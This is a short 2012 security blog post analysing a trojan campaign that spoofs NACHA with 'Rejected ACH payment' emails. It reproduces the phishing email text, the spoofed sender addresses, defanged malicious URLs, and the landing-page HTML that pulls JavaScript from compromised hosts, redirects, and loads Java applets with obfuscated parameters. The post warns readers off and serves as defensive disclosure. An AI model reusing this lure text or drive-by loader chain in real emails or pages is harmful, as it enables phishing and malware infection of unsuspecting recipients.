Emails regarding rejected ACH payment contains security risk
January 31, 2012 Leave a Comment
MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subjects like:
Rejected ACH transaction
Rejected ACH payment
Your ACH transfer
…
The email is send from the spoofed addresses like:
“\”The Electronic Payments Association\” risk.manager”@nacha.org
“\”The Electronic Payments Association\” alerts”@nacha.org
“\”The Electronic Payments Association\” risk”@nacha.org
“\”The Electronic Payments Association\” transfers”@nacha.org
“\”The Electronic Payments Association\” ach”@nacha.org
“\”The Electronic Payments Association\” payment”@nacha.org
…
The email has the following body:
The ACH transaction (ID: 02710822288793), recently sent from your checking account (by you or any other person), was rejected by the Electronic Payments Association.
Canceled transaction
Transaction ID: 02710822288793
Reason for rejection See details in the report below
Transaction Report report_02710822288793.doc (Microsoft Word Document)13450 Sunrise Valley Drive, Suite 100
Herndon, VA 201712011 NACHA – The Electronic Payments Association
A sample of the email:

The URLs for the transaction report are different and in some cases no longer valid. Some examples:
hxxp://minalimo.com/f9oYYmiY/index.html
hxxp://maerlipinte.ch/LaV4inWa/index.html
hxxp://hotel-sicily.it/aRpcdCjd/index.html
…
One of the URLs did give us a result: hxxp://ftp.samisalami.com/8KQZuSAy/index.html.
When investigating the HTML code of this web page we got the following:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firstnamestore.com/utn08WYD/js.js”></script>
<script type=”text/javascript” src=”hxxp://ftp.adamsmarketing.com/VRssE3iH/js.js”></script>
<script type=”text/javascript” src=”hxxp://mediapoolstarnberg.de/WrqeCaoy/js.js”></script>
<script type=”text/javascript” src=”hxxp://paolomisirochi.com/nqrmZKRC/js.js”></script>
<script type=”text/javascript” src=”hxxp://lonnytyler.com/MZF0uXsc/js.js”></script>
<script type=”text/javascript” src=”hxxp://orquestrachapo.com/jAmCDzeM/js.js”></script></html>
As you can see, some Javascripts are loaded when opening this web page. Some URLs to the javascripts are also obsolete but some of them returns the code: “document.location=’hxxp://sulusate.com/forum/index.php?showtopic=997439′;”.
The above URL gives us the web page with the following code:
<body>
<applet code=’Verifa.class’ archive=’rhi.jar’ width=’24′ height=’22′>
<param name=”dest” value=”lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAvlmrs”>
</applet>
</body><body>
<applet code=’Ooo.class’ archive=’Ooo.jar’ width=’24′ height=’22′>
<param name=”dest” value=”lxxt>33wypywexi2gsq3jsvyq3pseh2tltCwls{jsvyqAsfi”>
</applet>
</body>
When opening the URLs in a web browser – something we do not recommend to even try – you will get redirected to bing.com or another web site so you won’t see this code.
It seems that some javascript is obfuscated and that .jar files are involved here inside an applet. The risk is that these applets in java could contain malicious code. Ooo.jar is however related to OpenOffice but in this case it can also be used for phishing.
This email is a security risk – a virus or a phishing attempt – for sure so do not follow any URLs or open files.




















